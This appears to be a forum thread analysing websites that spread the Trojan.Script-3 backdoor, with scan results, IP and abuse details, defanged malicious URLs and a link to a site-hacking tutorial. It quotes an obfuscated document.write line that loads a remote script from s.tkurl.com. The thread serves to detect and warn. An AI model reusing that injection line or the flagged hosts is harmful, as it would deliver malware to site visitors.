What is Trojan.Script-3

Viruses and worms
1

VW detects here: Up(nil): Trojan.Script-3 APNIC CN abuse_gdnoc at 189.cn 183.60.207.158 to 183.60.207.158 515515.net htxp://515515.net/portal.php
Up(nil): Trojan.Script-3 APNIC CN abuse_gdnoc at 189.cn 183.60.207.158 to 183.60.207.158 515515.net htxp://515515.net/member.php?mod=register
Up(nil): Trojan.Script-3 APNIC CN abuse_gdnoc at 189.cn 183.60.207.158 to 183.60.207.158 515515.net htxp://515515.net/member.php?
Bitdefender TrafficLight flags the site as malicious.
A backdoor trojan that spreads from infesting sites via for instance pop-up ads and that boots with Windows boot and it may enable an attacker to release commands and remotely monitor the infested PC, also act as an info-stealer.
See: https://www.virustotal.com/nl/url/fb146ab5ee96aadf8b3eb2bbe37151cb6e187fde6ee75ff89991d8dff4867a17/analysis/1404726792/
See: http://sharingmyip.com/?site=515515.net
Not being detected by this recommended scanner :o → http://sitecheck.sucuri.net/results/515515.net/portal.php

polonus

2

html
https://www.metascan-online.com/en/scanresult/file/a8e8aa15dacb4737aa9ec07201c9e26b

php
https://www.metascan-online.com/en/scanresult/file/400f7492fbec46678598fd09ddf180cf

3

Another site that spreads Trojan.Script-3: htxp://0411dd.com/list.php?catid=31&page=&page=&page=&page=50
Vulnerable - custom errors fail ->: https://asafaweb.com/Scan?Url=0411dd.com%2Flist.php%3Fcatid%3D31 (microsoft-iis/7.5)
Web Security Test reveals:
javascript check flags: Suspicious
  <
Included script check flags:
Suspect - please check list for unknown includes
Suspicious Script:
0411dd dot com/images/js/common.js
document.write(unescape(“%3cscript src=‘htxp://s.tkurl.com/navigatoral.js’ type=‘text/javascript’%3e%3c/script%3e”));
External links check:
htxp://www.cida.org.cn/ → ‘’
htxp://zs.tmjob88.com/ → ‘’
htxp://www.lowlo.cn/ → ‘’
htxp://www.cnzs114.com → ‘’
htxp://tuku.letfind.com.cn/ → ‘’
htxp://www.adcc.org.cn/ → ‘’
htxp://www.5agc.cn/ → ‘’
htxp://www.i-jjj.com → ‘爱家家居网’
htxp://www.to8to.com → ‘土巴兔装修’
htxp://nj.51zsjc.com → ‘南京装饰建’
htxp://www.hain.jzqyw.com → ‘海南建筑企’
htxp://www.szzstx.com → ‘深圳装饰天’
htxp://www.decorhr.com → ‘装饰人才网’
htxp://www.51zhuwo.com → ‘济南装修’

Site rep index 40 - Status: Suspicious 0411dd dot com,121.198.156.169, ns15.xincache dot com, Parked/expired,

polonus

4

Hi Pondus,

So the attack code is typically flagged for portal.php → htxp://www.cyberarmy.in/2011/01/portal-hacking-dnn-website-hacking.html
& “%3e%3c/script%3e” is being used in tracking code.
avast! Webshield detects JS;ScriptXE-inf[Trj] in the browser executable.

pol